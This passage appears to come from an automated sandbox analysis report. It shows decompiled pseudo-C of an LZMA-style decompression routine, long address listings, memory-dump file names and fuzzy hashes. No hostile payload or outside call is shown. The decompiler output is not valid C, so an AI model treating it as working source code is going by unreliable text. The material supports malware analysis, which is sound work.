													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                0x00000000
                                                0x00406f5b
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f84
                                                0x00406f8e
                                                0x00000000
                                                0x00406f61
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x0040704f
                                                0x0040704f
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x0040700d
                                                0x0040700d
                                                0x0040700d
                                                0x004067a9
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f94
                                                0x00406f94
                                                0x00406f9a
                                                0x00406fa0
                                                0x00406fa6
                                                0x00406fc0
                                                0x00406fc3
                                                0x00406fc9
                                                0x00406fd4
                                                0x00406fd4
                                                0x00406fd6
                                                0x00406fa8
                                                0x00406fa8
                                                0x00406fb7
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fe0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00407195
                                                0x00000000
                                                0x00407195
                                                0x00406ff2
                                                0x00406ff9
                                                0x00407001
                                                0x00407004
                                                0x00407007
                                                0x00407007
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00000000
                                                0x004069b2
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00000000
                                                0x00000000
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00000000
                                                0x00000000
                                                0x00406c71
                                                0x00406c75
                                                0x00000000
                                                0x00000000
                                                0x00406c7b
                                                0x00406c7f
                                                0x00000000
                                                0x00000000
                                                0x00406c85
                                                0x00406c87
                                                0x00406c8b
                                                0x00406c8b
                                                0x00406c8e
                                                0x00406c92
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00000000
                                                0x00406cfd
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00406d2c
                                                0x00406d2c
                                                0x00406d2f
                                                0x00406d36
                                                0x00406d3b
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00406c1c
                                                0x00406c1c
                                                0x00406c1f
                                                0x00406f91
                                                0x00406f91
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x00000000
                                                0x00407048
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x0040700d
                                                0x0040700d
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x00000000
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x004071ab
                                                0x004071b1
                                                0x004071b3
                                                0x004071ba
                                                0x004071bc
                                                0x004071c3
                                                0x004071c7
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000
                                                0x004071c0
                                                0x0040700d
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x004070ea
                                                0x00000000
                                                0x00406f5f

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                                • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
